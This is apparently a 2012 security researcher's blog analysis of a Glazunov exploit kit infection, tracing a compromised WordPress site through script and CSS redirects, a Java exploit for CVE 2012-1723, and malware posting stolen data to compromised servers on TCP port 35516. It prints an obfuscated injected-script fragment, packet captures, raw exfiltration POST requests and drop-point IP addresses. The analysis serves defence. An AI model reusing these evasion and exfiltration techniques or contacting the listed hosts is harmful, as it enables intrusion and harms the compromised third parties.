As per Emergingthreats, this is the Glazunov exploit kit.
This particular case is an excellent example to demonstrate that malware authors do their best to avoid detection and do not play by the internet rules. The utilization of defense in depth is a critical component to any information security program and would assist in limiting the damage from an attack of this nature.
This example shows:
- A compromised site/malicious site which is, for the better part, unrecognized.
- A redirect to HTTP TCP port 8080 direct to IP
- Content delivery which appear innocuous in URL logs.
- Java exploits which are not detected by virtually any AV
- Malware which is not detected
- Exfiltration of data on high ports showing as only TCP connections
- Utilizing other people's IP addresses as drop points
This was achieved because of the following gaps in security:
- Endpoint did not have updated Java version and was vulnerable
- Web filtering did not block direct to IP requests
- Layer 7 filtering was not performed at the perimeter (IPS) for the exploit code.
- AV did not detect the malware
- Outbound ports were not restricted. The endpoint could communicate outbound.
The entry point is a 301 redirect, however the content length is a28 and there is what AVG recognizes as a Blackhole redirect in the 301 response.
hxxp://www.helloooooo.com/2009/01/splinter-impostor-claims-worlds-longest-hair/
This is a dangerous website and should not be visited in a browser.
The next step is for me to get the redirect URL.
GET /2009/01/splinter-impostor-claims-worlds-longest-hair/ HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.helloooooo.com
Connection: Keep-Alive
And gives me a gift... to quote my friend Tarun.
HTTP/1.1 200 OK
Date: Tue, 27 Nov 2012 00:10:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Pingback: http://www.helloooooo.com/xmlrpc.php
Link: <http://www.helloooooo.com/?p=1892>; rel=shortlink
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
5244
<script>if(window.document)try{new location(12);}catch(qqq){aa=[]+0;aaa=0+[];
The redirect is to a rigo6680.zapto.org/?go=2, this is consistent with TDS redirects.
http://jsunpack.jeek.org/?report=a41f7d02a6ef035c6808676b1cbd74814d53c88b
Additional redirects appear everywhere on the page, see the CSS redirect below.
Redirect from a CSS file.
http://wepawet.iseclab.org/view.php?hash=38d20de85abbc89a79ad6901b4f7becb&type=js&t=1354367725
What happens next?
The following URL chain occurs. Included in here is a youtube video, 74.125.x.y ip address.
609 31.956187 10.1.2.3 -> 74.125.236.9 HTTP 408 GET /v/hYaYCPmFWKw&hl=en&fs=1 HTTP/1.1
613 32.126215 10.1.2.3 -> 65.163.12.222 HTTP 454 GET /wp-content/themes/twentyten/images/wordpress.png HTTP/1.1
616 32.196442 65.163.12.222 -> 10.1.2.3 HTTP 1152 HTTP/1.1 200 OK (PNG)
625 32.545505 74.125.236.9 -> 10.1.2.3 HTTP 674 HTTP/1.1 200 OK (application/x-shockwave-flash)
637 33.374071 10.1.2.3 -> 64.34.183.111 HTTP 335
GET /2354796716/12230 HTTP/1.1
673 33.543459 10.1.2.3 -> 74.125.236.1 HTTP 382 GET /yts/swfbin/watch_as3-vfl1ubMZd.swf HTTP/1.1
688 33.587050 64.34.183.111 -> 10.1.2.3 HTTP 104 HTTP/1.1 200 OK (application/x-java-archive)
695 33.626438 10.1.2.3 -> 64.34.183.111 HTTP 292
GET /2354796716/12230 HTTP/1.1
744 33.867125 64.34.183.111 -> 10.1.2.3 HTTP 104 HTTP/1.1 200 OK (application/x-java-archive)
770 34.193535 10.1.2.3 -> 64.34.183.111 HTTP 245
GET /15692 HTTP/1.1
931 34.501338 64.34.183.111 -> 10.1.2.3
HTTP/DL 958 unknown (0x4d)
Here's the Java.
And we run the Java, which contains CVE 2012-1723 and the binary materializes and is executed immediately.
Posting Data to Drop Points
What we get are connections on TCP port 35516 posting data to compromised Windows servers online.
What is interesting about this is that it is not recognized as HTTP. It is only protocol TCP and on outbound port 35516. This would fly under the radar of many detection mechanisms.
This infection is a wonderful case study in an infection chain using difficult to detect methods and exploiting weaknesses in infrastructure, perimeter security and vulnerable workstation software.
Four IP addresses were drop points:
131.96.243.22
74.59.207.114
68.197.117.117
87.203.78.137
The infection point is 64.34.183.111:8080
Here is what the Posting looks like.
VT for Jar file. CVE 2012-1723 - 2/46
https://www.virustotal.com/file/4f88dd9dbeaba9a59ab1c077b4e98be72c66e59f79ad8cc95c0952530ca698f3/analysis/1354328781/
ed-309-aaenak.gsu.edu
Raw POST information
POST /nymain/nm1932719/index.php HTTP/1.1
Host: 131.96.243.22
Content-Length: 54
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Cache-Control: no-cache
Connection: close
filename=bphgt.ntz&data=œT¬»ñOõ[!5a9±r8ÆàSÞ¼ƒAôˆPöêÙ
HTTP/1.1 200 OK
Content-Length: 4
Connection: close
[
------------------------------------------------------------------
POST /nymain/nm1932719/index.php HTTP/1.1
Host: 74.59.207.114
Content-Length: 58
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Cache-Control: no-cache
Connection: close
filename=skjlrke.kcf&data=¾¤±ß]NçWB\—%~}SóCå£tZ‡£¬4Ø–‘
videotron.ca (1)
Host: modemcable114.207-59-74.mc.videotron.ca
@fknsec
All investigations were performed in my personal lab. This article's content and any opinions expressed are not the opinions of any past, present or future employer. Lawyers are our friends.